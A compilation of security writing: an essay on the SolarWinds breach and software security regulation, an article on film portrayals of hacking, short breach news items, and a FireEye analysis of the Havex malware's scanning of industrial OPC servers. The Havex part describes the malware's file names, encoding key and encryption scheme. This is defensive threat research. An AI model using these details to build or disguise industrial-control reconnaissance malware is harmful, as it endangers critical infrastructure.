Biden took a more realistic tone last week when he spoke of the need to improve US defenses. The initial focus will likely be on how to clean the hackers out of our networks, why the National Security Agency and US Cyber Command failed to detect this intrusion and whether the 2-year-old Cybersecurity and Infrastructure Security Agency has the resources necessary to defend the United States against attacks of this caliber. These are important discussions to have, but we also need to address the economic incentives that led to SolarWinds being breached and how that insecure software ended up in so many critical US government networks.

Software has become incredibly complicated. Most of us almost don’t know all of the software running on our laptops and what it’s doing. We don’t know where it’s connecting to on the Internet­ — not even which countries it’s connecting to­ — and what data it’s sending. We typically don’t know what third party libraries are in the software we install. We don’t know what software any of our cloud services are running. And we’re rarely alone in our ignorance. Finding all of this out is incredibly difficult.

This is even more true for software that runs our large government networks, or even the Internet backbone. Government software comes from large companies, small suppliers, open source projects and everything in between. Obscure software packages can have hidden vulnerabilities that affect the security of these networks, and sometimes the entire Internet. Russia’s SVR leveraged one of those vulnerabilities when it gained access to SolarWinds’ update server, tricking thousands of customers into downloading a malicious software update that gave the Russians access to those networks.

The fundamental problem is one of economic incentives. The market rewards quick development of products. It rewards new features. It rewards spying on customers and users: collecting and selling individual data. The market does not reward security, safety or transparency. It doesn’t reward reliability past a bare minimum, and it doesn’t reward resilience at all.

This is what happened at SolarWinds. A New York Times report noted the company ignored basic security practices. It moved software development to Eastern Europe, where Russia has more influence and could potentially subvert programmers, because it’s cheaper.

Short-term profit was seemingly prioritized over product security.

Companies have the right to make decisions like this. The real question is why the US government bought such shoddy software for its critical networks. This is a problem that Biden can fix, and he needs to do so immediately.

The United States needs to improve government software procurement. Software is now critical to national security. Any system for acquiring software needs to evaluate the security of the software and the security practices of the company, in detail, to ensure they are sufficient to meet the security needs of the network they’re being installed in. Procurement contracts need to include security controls of the software development process. They need security attestations on the part of the vendors, with substantial penalties for misrepresentation or failure to comply. The government needs detailed best practices for government and other companies.

Some of the groundwork for an approach like this has already been laid by the federal government, which has sponsored the development of a “Software Bill of Materials” that would set out a process for software makers to identify the components used to assemble their software.

This scrutiny can’t end with purchase. These security requirements need to be monitored throughout the software’s life cycle, along with what software is being used in government networks.

None of this is cheap, and we should be prepared to pay substantially more for secure software. But there’s a benefit to these practices. If the government evaluations are public, along with the list of companies that meet them, all network buyers can benefit from them. The US government acting purely in the realm of procurement can improve the security of nongovernmental networks worldwide.

This is important, but it isn’t enough. We need to set minimum safety and security standards for all software: from the code in that Internet of Things appliance you just bought to the code running our critical national infrastructure. It’s all one network, and a vulnerability in your refrigerator’s software can be used to attack the national power grid.

The IOT Cybersecurity Improvement Act, signed into law last month, is a start in this direction.

The Biden administration should prioritize minimum security standards for all software sold in the United States, not just to the government but to everyone. Long gone are the days when we can let the software industry decide how much emphasis to place on security. Software security is now a matter of personal safety: whether it’s ensuring your car isn’t hacked over the Internet or that the national power grid isn’t hacked by the Russians.

This regulation is the only way to force companies to provide safety and security features for customers — just as legislation was necessary to mandate food safety measures and require auto manufacturers to install life-saving features such as seat belts and air bags. Smart regulations that incentivize innovation create a market for security features. And they improve security for everyone.

It’s true that creating software in this sort of regulatory environment is more expensive. But if we truly value our personal and national security, we need to be prepared to pay for it.

The truth is that we’re already paying for it. Today, software companies increase their profits by secretly pushing risk onto their customers. We pay the cost of insecure personal computers, just as the government is now paying the cost to clean up after the SolarWinds hack. Fixing this requires both transparency and regulation. And while the industry will resist both, they are essential for national security in our increasingly computer-dependent worlds.

This essay previously appeared on

Fact vs. Fiction: Film Industry’s Portrayal of Cybersecurity

Article by Beau Peters

The movie industry is infamous for its loose depictions of hacking and cybersecurity. Hollywood often gets a lot wrong about hacking and digital protections, but what does it get right?

The power of film in influencing the future of technology and the experts that create it is immense. Because of this, it is important to assess what the facts are versus movie fiction.  Here, we’ll explore the film industry’s portrayal of cybersecurity.

Cybersecurity in Movies
From WarGames to Blackhat, hacking and cybersecurity movies have glamorized the world of digital safety and the compromising of said safety. However, each Hollywood outing does so with varying levels of realism, typically embracing excitement over reality. 
In the 1983 WarGames movie, a young hacker almost triggers World War 3
These portrayals have led to common tropes and views of the cybersecurity industry in their attempts to prevent and combat hacking attempts. Among these tropes are some of the following portrayals, each occurring with varying degrees of absurdity.

1 Hacking is exciting, fast, and often ethical
The trope of a computer-savvy individual slamming on a keyboard for a few seconds and saying “I’m in” is common enough to be a defining joke about cybersecurity in film. Hacking is shown to be a process that takes minutes with has instant results. This is often far from reality, where hacking attempts can take weeks or even months to produce results.

And the results of actual digital break-ins are often far from ethical. Movies tend to show hacking as a victimless crime, but real-life hacking tends to mean data theft that can have severe implications on people’s lives.

2. There is a visually distinct or compelling element of hacking 
Hollywood has to keep an audience engaged. Because of this, hacking and cybersecurity are often paired with some visually striking element that would simply be ridiculous in reality.

Jurassic Park has a great scene exemplifying this trope. Under attack from a velociraptor, a child logs on to a computer and proceeds to navigate through a 3D maze representing the computer system’s files. In reality, typing in a few commands would have achieved a result faster. However, this wouldn’t have been as exciting.

3. Hacking and cybersecurity are defined by excessively fast typing
You always know a hacker or a computer systems expert by their excessively fast keyboard smashing. In movies and TV, computer experts are always clicking away at a keyboard at speeds few of us could match, speeds that would unlikely result in very productive work due to mistakes and time needed to assess the situation.

However, fast typing is a staple of hacking movies. The faster you type, the faster you can get in or defend a system.

When compared to the reality of cybersecurity systems, these Hollywood portrayals often come up short. Though some movies are getting better at portraying hacking and security, they rarely capture the grittier, less exciting truth. 

Cybersecurity in Reality
In reality, hacking is a much more time consuming and boring process, with results that have real impacts on the lives of everyday people. Hollywood neglects some of these finer points in favour of spectacle, as can be expected. Cybersecurity comes with its own set of tedious practices as well as the glamorous aspects of navigating computer systems.

Here are just a few ways that hacking and cybersecurity operate in the real world that movies tend to obscure or fail to depict:

1. Hacking is about information more than profit.
While cybercriminals can sometimes come away with a profit, doing so is incredibly difficult and not very common. Ransomware is sometimes used to extort profits from corporations, a process that occurs when a cybercriminal uses malware to hold a system hostage until a payment is made. However, break-ins usually result in little more than data theft or blockages with costly implications for businesses and individuals.

For example, Distributed Denial of Service (DDoS) attacks are used to slow or stop the computer processes of a business. This doesn’t necessarily result in any money for the hackers, but the downtime can cost companies thousands to millions of dollars.

2. Hackers rely heavily on phishing and social engineering.
Breaking into a system often requires access to valid user IDs and account passwords. This means hackers tend to use phishing and social engineering methods to mine information. They use all kinds of bots and scams to try and trick average individuals into clicking a link or divulging personal information.

However, this means that a lot of good can be done in the cybersecurity world without even needing to code. Simply teaching teams what to look for in avoiding scams and fraud can be a great way to approach cybersecurity incident management and keep private data safe.

3. White-hat hackers are real, and they make good money.
One thing movies get right sometimes is that hackers can be the good guys. There is a whole category of ethical hackers who often work as bounty hunters to find flaws in a company's cybersecurity systems. These so-called “white hat” hackers attempt to break in and are paid a bounty if they can reveal security deficiencies.

Sometimes, white-hat hacking comes with a significant paycheck. The bounty platform HackerOne has paid out $40 million across 2020 alone, making seven different hackers millionaires in a single year.

With the desperate need for individuals in the cybersecurity field, the truth around hacking is important to note. While Hollywood can make hacking seem glamorous and exciting, the truth is that many hacking processes come with dangerous implications. However, hacking can also be used to benefit the safety of information in ethical bounty situations.

With the emergence of cloud computing as a standard for remote workspaces, security professionals are needed now more than ever. Secure public and private cloud solutions are required for a functioning application marketplace, and cybersecurity professionals play a key role in maintaining that safety.

While cybersecurity isn’t always exciting, the results of keeping systems safe are much more rewarding than the black-hat alternatives.

The movie industry propagates a view of the cybersecurity field that is often far from reality. However, by acknowledging the departures from the truth, we get a better idea of the need and value of cybersecurity solutions as a whole, especially in the modern world of accelerated digital innovation.

While hacking and cybersecurity might not be anywhere near as exciting as they are in movies, working in cybersecurity—whether as a systems expert or a white-hat hacker—can mean a big paycheck and a safer world for the people you know and love. And that reality is better than any movie.

iPhones vulnerable to hacking tool for months, researchers say

Analysis: NSO Group’s Pegasus spyware could allegedly track locations and access passwords

For almost a year, spyware sold by Israel’s NSO Group was allegedly armed with a computer security super-weapon: a zero-footprint, zero-click, zero-day exploit that used a vulnerability in iMessage to seize control of an iPhone at the push of a button.

That means it would have left no visible trace of being placed on target’s phones, could be installed by simply sending a message that the victim didn’t even need to click on, and worked even on phones that were running the then-latest version of iOS, the operating system for iPhones.

Continue reading...

Twitter hires veteran hacker Mudge as head of security

Peiter Zatko’s appointment follows mass attack on social media platform in July

Twitter has appointed one of the world’s most respected hackers as its new head of security in the wake of a humiliating mass attack in July.

The company has placed Peiter Zatko in charge of protecting its platform from threats of all varieties, poaching him from the payments startup Stripe. Zatko is better known as Mudge, his handle for more than 20 years of operation on both sides of the information security arena.

Related: Why are public thinkers flocking to Substack? | Sean Monahan

Continue reading...

BA fined record £20m for customer data breach

Personal details of more than 400,000 customers accessed by hackers in 2018

A £183m fine levied on British Airways for a data breach has been reduced to £20m after investigators took into account the airline’s financial plight and the circumstances of the cyber-attack.

The £20m fine is nonetheless the biggest ever issued by the Information Commissioner’s Office (ICO), following the 2018 incident in which more than 400,000 customers’ personal details were compromised by hackers.

Continue reading...

EasyJet reveals cyber-attack exposed 9m customers’ details

Airline apologises after credit card details of about 2,200 passengers were stolen
Q&A: are you affected and what should you do?

EasyJet has revealed that the personal information of 9 million customers was accessed in a “highly sophisticated” cyber-attack on the airline.

The company said on Tuesday that email addresses and travel details were accessed and it would contact the customers affected.

Continue reading...

The Myth of “Staying One Step Ahead of the Hackers”


The assumption that software security can stay ahead of the hackers is not true because the software security industry is always reacting to threats that hackers expose. Once hackers start exploiting a flaw in an application, security companies try to block the resulting threat by providing security updates for existing software or by developing new programs. Either way, hackers will be one step ahead because the software security industry can’t predict what new threats the hackers will unleash.

Havex, It’s Down With OPC

FireEye recently analyzed the capabilities of a variant of Havex (referred to by FireEye as “Fertger” or “PEACEPIPE”), the first publicized malware reported to actively scan OPC servers used for controlling SCADA (Supervisory Control and Data Acquisition) devices in critical infrastructure (e.g., water and electric utilities), energy, and manufacturing sectors.

While Havex itself is a somewhat simple PHP Remote Access Trojan (RAT) that has been analyzed by other sources, none of these have covered the scanning functionality that could impact SCADA devices and other industrial control systems (ICS). Specifically, this Havex variant targets servers involved in OPC (Object linking and embedding for Process Control) communication, a client/server technology widely used in process control systems (for example, to control water pumps, turbines, tanks, etc.).

Note: ICS is a general term that encompasses SCADA (Supervisory Control and Data Acquisition) systems, DCS (Distributed Control Systems), and other control system environments. The term SCADA is well-known to wider audiences, and throughout this article, ICS and SCADA will be used interchangeably.

Threat actors have leveraged Havex in attacks across the energy sector for over a year, but the full extent of industries and ICS systems affected by Havex is unknown. We decided to examine the OPC scanning component of Havex more closely, to better understand what happens when it’s executed and the possible implications.

OPC Testing Environment

To conduct a true test of the Havex variant’s functionality, we constructed an OPC server test environment that fully replicates a typical OPC server setup (Figure 1 [3]). As shown, ICS or SCADA systems involve OPC client software that interacts directly with an OPC server, which works in tandem with the PLC (Programmable Logic Controller) to control industrial hardware (such as a water pump, turbine, or tank). FireEye replicated both the hardware and software the OPC server setup (the components that appear within the dashed line on the right side of Figure 1).




Figure 1: Topology of typical OPC server setup

The components of our test environment are robust and comprehensive to the point that our system could be deployed in an environment to control actual SCADA devices. We utilized an Arduino Uno [1] as the primary hardware platform, acting as the OPC server. The Arduino Uno is an ideal platform for developing an ICS test environment because of the low power requirements, a large number of libraries to make programming the microcontroller easier, serial communication over USB, and cheap cost. We leveraged the OPC Server and libraries from St4makers [2] (as shown in Figure 2). This software is available for free to SCADA engineers to allow them to develop software to communicate information to and from SCADA devices.


Figure 2: OPC Server Setup

Using the OPC Server libraries allowed us to make the Arduino Uno act as a true, functioning OPC SCADA device (Figure 3).


Figure 3: Matrikon OPC Explorer showing Arduino OPC Server

We also used Matrikon’s OPC Explorer [1], which enables browsing between the Arduino OPC server and the Matrikon embedded simulation OPC server. In addition, the Explorer can be used to add certain data points to the SCADA device – in this case, the Arduino device.


Figure 4: Tags identified for OPC server

In the OPC testing environment, we created tags in order to simulate a true OPC server functioning. Tags, in relation to ICS devices, are single data points. For example: temperature, vibration, or fill level. Tags represent a single value monitored or controlled by the system at a single point in time.

With our test environment complete, we executed the malicious Havex “.dll" file and analyzed how Havex’s OPC scanning module might affect OPC servers it comes in contact with.


The particular Havex sample we looked at was a file named PE.dll (6bfc42f7cb1364ef0bfd749776ac6d38). When looking into the scanning functionality of the particular Havex sample, it directly scans for OPC servers, both on the server the sample was submitted on, and laterally, across the entire network.

The scanning process starts when the Havex downloader calls the runDll export function.  The OPC scanner module identifies potential OPC servers by using the Windows networking (WNet) functions.  Through recursive calls to WNetOpenEnum and WNetEnumResources, the scanner builds a list of all servers that are globally accessible through Windows networking.  The list of servers is then checked to determine if any of them host an interface to the Component Object Models (COM) listed below:




Screen Shot 2014-07-17 at 12.31.56 PM



Figure 5: Relevant COM objects

Once OPC servers are identified, the following CLSIDs are used to determine the capabilities of the OPC server:

Screen Shot 2014-07-17 at 12.33.22 PM

            Figure 6: CLSIDs used to determine capabilities of the OPC server

When executing PE.dll, all of the OPC server data output is first saved as %TEMP%\[random].tmp.dat. The results of a capability scan of an OPC server is stored in %TEMP%\OPCServer[random].txt. Files are not encrypted or deleted once the scanning process is complete.

Once the scanning completes, the log is deleted and the contents are encrypted and stored into a file named %TEMP%\[random].tmp.yls.  The encryption process uses an RSA public key obtained from the PE resource TYU.  The RSA key is used to protect a randomly generated 168-bit 3DES key that is used to encrypt the contents of the log.

The TYU resource is BZip2 compressed and XORed with the string “1312312”.  A decoded configuration for 6BFC42F7CB1364EF0BFD749776AC6D38 is included in the figure below:

Screen Shot 2014-07-17 at 12.27.24 PM

Figure 7: Sample decoded TYU resource

The 4409de445240923e05c5fa6fb4204 value is believed to be an RSA key identifier. The AASp1… value is the Base64 encoded RSA key.

A sample encrypted log file (%TEMP%\[random].tmp.yls) is below.














00000000  32 39 0a 66 00 66 00 30  00 30 00 66 00 66 00 30 29.f.f.0.0.f.f.000000010  00 30 00 66 00 66 00 30  00 30 00 66 00 66 00 30 .0.f.f.0.0.f.f.000000020  00 30 00 66 00 66 00 30  00 30 00 66 00 66 00 30 .0.f.f.0.0.f.f.000000030  00 30 00 66 00 66 00 30  00 30 00 66 00 37 39 36 .0.f.f.0.0.f.79600000040  0a 31 32 38 0a 96 26 cc  34 93 a5 4a 09 09 17 d3 .128..&.4..J....00000050  e0 bb 15 90 e8 5d cb 01  c0 33 c1 a4 41 72 5f a5 .....]...3..Ar_.00000060  13 43 69 62 cf a3 80 e3  6f ce 2f 95 d1 38 0f f2 .Cib....o./..8..00000070  56 b1 f9 5e 1d e1 43 92  61 f8 60 1d 06 04 ad f9 V..^..C.a.`.....00000080  66 98 1f eb e9 4c d3 cb  ee 4a 39 75 31 54 b8 02 f....L...J9u1T..00000090  b5 b6 4a 3c e3 77 26 6d  93 b9 66 45 4a 44 f7 a2 ..J<.w&m..fEJD..000000A0  08 6a 22 89 b7 d3 72 d4  1f 8d b6 80 2b d2 99 5d .j"...r.....+..]000000B0  61 87 c1 0c 47 27 6a 61  fc c5 ee 41 a5 ae 89 c3 a...G'ja...A....000000C0  9e 00 54 b9 46 b8 88 72  94 a3 95 c8 8e 5d fe 23 ..T.F..r.....].#000000D0  2d fb 48 85 d5 31 c7 65  f1 c4 47 75 6f 77 03 6b -.H..1.e..Guow.k


--Truncated--Probable Key Identifierff00ff00ff00ff00ff00ff00ff00fRSA Encrypted 3DES Key5A EB 13 80 FE A6 B9 A9 8A 0F 41…The 3DES key will be the last 24 bytes of the decrypted result.3DES IV88 72  94 a3 95 c8 8e 5d3DES Encrypted Logfe 23 2d fb 48 85 d5 31 c7 65 f1…

Figure 8: Sample encrypted .yls file


When executing PE.dll against the Arduino OPC server, we observe interesting responses within the plaintext %TEMP%\[random].tmp.dat:



Screen Shot 2014-07-17 at 12.41.27 PM



Figure 9: Sample scan log

The contents of the tmp.dat file are the results of the scan of the network devices, looking for OPC servers. These are not the in-depth results of the OPC servers themselves, and only perform the initial scanning.

The particular Havex sample in question also enumerates OPC tags and fully interrogates the OPC servers identified within %TEMP%\[random].tmp.dat. The particular fields queried are: server state, tag name, type, access, and id. The contents of a sample %TEMP%\OPCServer[random].txt can be found below:



Screen Shot 2014-07-17 at 12.43.48 PM



Figure 10: Contents of OPCServer[Random].txt OPC interrogation

While we don’t have a particular case study to prove the attacker’s next steps, it is likely after these files are created and saved, they will be exfiltrated to a command and control server for further processing.


Part of threat intelligence requires understanding all parts of a particular threat. This is why we took a closer look at the OPC functionality of this particular Havex variant.  We don’t have any case study showcasing why the OPC modules were included, and this is the first “in the wild” sample using OPC scanning. It is possible that these attackers could have used this malware as a testing ground for future utilization, however.

Since ICS networks typically don’t have a high-level of visibility into the environment, there are several ways to help minimize some of the risks associated with a threat like Havex. First, ICS environments need to have the ability to perform full packet capture ability. This gives incident responders and engineers better visibility should an incident occur.

Also, having mature incident processes for your ICS environment is important. Being able to have security engineers that also understand ICS environments during an incident is paramount. Finally, having trained professionals consistently perform security checks on ICS environments is helpful. This ensures standard sets of security protocols and best practices are followed within a highly secure environment.

We hope that this information will further educate industrial control systems owners and the security community about how the OPC functionality of this threat works and serves as the foundation for more investigation. Still, lots of questions remain about this component of Havex. What is the attack path? Who is behind it? What is their intention? We’re continuing to track this specific threat and will provide further updates as this new tactic unfolds.


We would like to thank Josh Homan for his help and support.

Related MD5s